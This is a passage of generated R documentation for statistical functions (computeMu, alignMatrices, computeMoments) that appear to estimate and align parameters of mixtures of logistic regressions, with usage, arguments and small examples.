The estimated normalized parameters as columns of a matrix mu of size dxK
}
\description{
Estimate the normalized columns mu of the beta matrix parameter in a mixture of
logistic regressions models, with a spectral method described in the package vignette.
}
\examples{
io <- generateSampleIO(10000, 1/2, matrix(c(1,0,0,1),ncol=2), c(0,0), "probit")
mu <- computeMu(io$X, io$Y, list(K=2)) #or just X and Y for estimated K

}
\seealso{
\code{multiRun} to estimate statistics based on mu,
  and \code{generateSampleIO} for I/O random generation.
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{alignMatrices}
\alias{alignMatrices}
\title{alignMatrices}
\usage{
alignMatrices(Ms, ref, ls_mode = c("exact", "approx1", "approx2"))
}
\arguments{
\item{Ms}{A list of matrices, all of same size DxK}

\item{ref}{A reference matrix to align other matrices with}

\item{ls_mode}{How to compute the labels assignment: "exact" for exact algorithm
(default, but might be time-consuming, complexity is O(K^3) ), or "approx1", or
"approx2" to apply a greedy matching algorithm (heuristic) which for each column in
reference (resp. in current row) compare to all unassigned columns in current row
(resp. in reference)}
}
\value{
The aligned list (of matrices), of same size as Ms
}
\description{
Align a set of parameters matrices, with potential permutations.
}
\examples{
m1 <- matrix(c(1,1,0,0),ncol=2)
m2 <- matrix(c(0,0,1,1),ncol=2)
ref <- m1
Ms <- list(m1, m2, m1, m2)
a <- alignMatrices(Ms, ref, "exact")
# a[[i]] is expected to contain m1 for all i

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{computeMoments}
\alias{computeMoments}
\title{computeMoments}
\usage{
computeMoments(X, Y)
}
\arguments{
\item{X}{Matrix of input data (size nxd)}

\item{Y}{Vector of binary outputs (size n)}
}
\value{
A list L where L[[i]] is the i-th cross-moment
}
\description{
Compute cross-moments of order 1,2,3 from X,Y
}
\examples{
X <- matrix(rnorm(100), ncol=2)
Y <- rbinom(100, 1, .5)
M <- computeMoments(X, Y)

}
